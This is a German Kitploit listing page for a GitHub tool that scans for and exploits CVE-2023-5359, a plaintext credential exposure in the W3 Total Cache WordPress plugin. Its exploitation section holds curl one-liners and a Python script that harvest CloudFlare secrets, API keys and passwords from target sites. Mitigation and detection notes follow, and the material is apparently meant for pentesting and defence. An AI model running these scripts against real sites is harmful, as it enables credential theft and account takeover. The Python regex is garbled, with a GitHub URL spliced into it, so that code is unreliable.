Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/enzocipher/cve-2023-5359
SchwachstellenscannerPasswortangriffeExploitationInformationsbeschaffungWebsicherheitLernen & Bildung
GitHubenzocipher/cve-2023-5359

CVE-2023-5359

CVE-2023-5359-Scanner für W3 Total Cache Klartextspeicherung-Schwachstelle. Erkennt exponierte Anmeldeinformationen (API-Schlüssel, OAuth-Tokens) in öffentlich zugänglichen PHP-Dateien. Enthält manuelle und automatisierte Exploit-Skripte.

Repository anzeigen
2vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-5359 - W3 Total Cache Schwachstelle durch Klartextspeicherung

Beschreibung

CVE-2023-5359 ist eine Schwachstelle durch Klartextspeicherung, die das WordPress-Plugin W3 Total Cache in Versionen ≤ 2.7.5 betrifft. Diese Schwachstelle ermöglicht es Remote-Angreifern, auf sensible Zugangsdaten zuzugreifen, die in unverschlüsselten, öffentlich zugänglichen PHP-Dateien gespeichert sind.

Schweregrad

  • CVSS-Score: 7.5 (Hoch)
  • Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • Typ: Offenlegung sensibler Informationen

Technische Schwachstelle

Grundursache

W3 Total Cache speichert Konfigurationseinstellungen und API-Zugangsdaten in PHP-Dateien innerhalb des Verzeichnisses /wp-content/plugins/w3-total-cache/ ohne ausreichenden Schutz. Diese Dateien sind über HTTP erreichbar und legen Folgendes offen:

  • API-Schlüssel (CloudFlare, Google usw.)
  • Client-Geheimnisse
  • OAuth-Token
  • Zugangsdaten für externe Dienste
  • Betroffene Dateien

    root@kitploit:~
    /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
    /wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
    /wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
    /wp-content/plugins/w3-total-cache/Config.php
    /wp-content/plugins/w3-total-cache/Cache_File.php
    

    Ausnutzung

    Manuelle Methode

    root@kitploit:~
    # Check if W3 Total Cache is installed
    curl -s https://target.com/ | grep "w3-total-cache"
    
    # Extract CloudFlare credentials
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"
    
    # Search all vulnerable files
    for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
        echo "=== $file ==="
        curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
    done
    

    Automatisiertes Skript

    root@kitploit:~
    #!/usr/bin/env python3
    import requests
    import re
    
    target = "https://victim.com"
    files = [
        "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
        "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
    ]
    
    for file in files:
        response = requests.get(target + file)
        credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/main/%5B%5E%27%5C%22%5D%2B)", response.text)
        if credentials:
            print(f"[!] Credentials found in {file}:")
            for key, value in credentials:
                print(f"    {key}: {value}")
    

    Auswirkungen

    Ein Angreifer kann Folgendes erlangen:

    1. CloudFlare-Zugangsdaten - Übernahme der Kontrolle über CDN und DNS
    2. API-Schlüssel für externe Dienste - Zugriff auf externe Konten
    3. OAuth-Token - Identität vortäuschen
    4. Cache-Konfigurationen - Manipulation ausgelieferter Inhalte

    Gegenmaßnahmen

    Sofortige Lösung

    1. Aktualisieren Sie auf W3 Total Cache ≥ 2.7.6
    2. Beschränken Sie den Zugriff auf PHP-Dateien im Plugins-Verzeichnis
    3. Widerrufen und neu generieren Sie alle offengelegten Zugangsdaten

    Sichere Konfiguration

    root@kitploit:~
    # .htaccess protection
    <Files *.php>
        Deny from all
    </Files>
    <Files "w3-total-cache.php">
        Allow from all
    </Files>
    

    Erkennung

    Überprüfungsbefehl

    root@kitploit:~
    # Check for vulnerable version
    curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"
    

    Indikatoren für eine Kompromittierung

    • Ungewöhnliche Aktivitäten in externen APIs
    • Änderungen an CloudFlare-Konfigurationen
    • Datenverkehr von nicht autorisierten IPs zu verbundenen Diensten

    Beispiel für einen Befund

    root@kitploit:~
    [*] Scanning: https://example.com
    [+] W3 Total Cache detected
    [+] Accessible file: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
    [!] CREDENTIALS FOUND:
        client_id: GAxxxxxxxxxxxx78
        client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345
    

    Referenzen

    • CVE-2023-5359
    • W3 Total Cache Änderungsprotokoll
    • WordPress-Sicherheitsteam

    Rechtlicher Hinweis

    Dieses Repository dient ausschließlich zu Bildungszwecken und für autorisierte Penetrationstests. Die böswillige Nutzung dieser Informationen ist strengstens untersagt.


    Fanden Sie diese Informationen nützlich? Geben Sie dem Repository einen Stern!

    Zuletzt aktualisiert: November 2025

    Tool herunterladen